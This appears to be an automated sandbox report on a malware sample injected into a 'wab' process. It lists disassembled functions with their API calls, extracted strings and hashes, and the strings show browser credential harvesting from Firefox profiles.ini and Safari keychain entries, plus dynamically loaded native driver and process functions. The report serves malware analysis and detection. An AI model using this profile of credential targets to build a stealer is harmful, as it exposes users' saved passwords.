                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcsicmp.MSVCRT ref: 004022A6
                                          • _wcsicmp.MSVCRT ref: 004022D7
                                          • _wcsicmp.MSVCRT ref: 00402305
                                          • _wcsicmp.MSVCRT ref: 00402333
                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                          • memset.MSVCRT ref: 0040265F
                                          • memcpy.MSVCRT ref: 0040269B
                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • memcpy.MSVCRT ref: 004026FF
                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                          • API String ID: 577499730-1134094380
                                          • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                          • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                          • String ID: :stringdata$ftp://$http://$https://
                                          • API String ID: 2787044678-1921111777
                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                          • GetDC.USER32 ref: 004140E3
                                          • wcslen.MSVCRT ref: 00414123
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                          • _snwprintf.MSVCRT ref: 00414244
                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 2080319088-3046471546
                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 00413221
                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                          • memset.MSVCRT ref: 00413292
                                          • memset.MSVCRT ref: 004132B4
                                          • memset.MSVCRT ref: 004132CD
                                          • memset.MSVCRT ref: 004132E1
                                          • memset.MSVCRT ref: 004132FB
                                          • memset.MSVCRT ref: 00413310
                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                          • memset.MSVCRT ref: 004133C0
                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                          • memcpy.MSVCRT ref: 004133FC
                                          • wcscpy.MSVCRT ref: 0041341F
                                          • _snwprintf.MSVCRT ref: 0041348E
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                          • SetFocus.USER32(00000000), ref: 004134B7
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                          • {Unknown}, xrefs: 004132A6
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                          • API String ID: 4111938811-1819279800
                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                          • EndDialog.USER32(?,?), ref: 0040135E
                                          • DeleteObject.GDI32(?), ref: 0040136A
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                          • ShowWindow.USER32(00000000), ref: 00401398
                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                          • String ID:
                                          • API String ID: 829165378-0
                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 00404172
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          • wcscpy.MSVCRT ref: 004041D6
                                          • wcscpy.MSVCRT ref: 004041E7
                                          • memset.MSVCRT ref: 00404200
                                          • memset.MSVCRT ref: 00404215
                                          • _snwprintf.MSVCRT ref: 0040422F
                                          • wcscpy.MSVCRT ref: 00404242
                                          • memset.MSVCRT ref: 0040426E
                                          • memset.MSVCRT ref: 004042CD
                                          • memset.MSVCRT ref: 004042E2
                                          • _snwprintf.MSVCRT ref: 004042FE
                                          • wcscpy.MSVCRT ref: 00404311
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                          • API String ID: 2454223109-1580313836
                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                          • memcpy.MSVCRT ref: 004115C8
                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                          • API String ID: 4054529287-3175352466
                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 3143752011-1996832678
                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                          • API String ID: 667068680-2887671607
                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 1607361635-601624466
                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _snwprintf$memset$wcscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 2000436516-3842416460
                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                          • String ID:
                                          • API String ID: 1043902810-0
                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@??3@_snwprintfwcscpy
                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                          • API String ID: 2899246560-1542517562
                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040DBCD
                                          • memset.MSVCRT ref: 0040DBE9
                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                          • wcscpy.MSVCRT ref: 0040DC2D
                                          • wcscpy.MSVCRT ref: 0040DC3C
                                          • wcscpy.MSVCRT ref: 0040DC4C
                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                          • wcscpy.MSVCRT ref: 0040DCC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                          • API String ID: 3330709923-517860148
                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                          • memset.MSVCRT ref: 0040806A
                                          • memset.MSVCRT ref: 0040807F
                                          • _wtoi.MSVCRT ref: 004081AF
                                          • _wcsicmp.MSVCRT ref: 004081C3
                                          • memset.MSVCRT ref: 004081E4
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
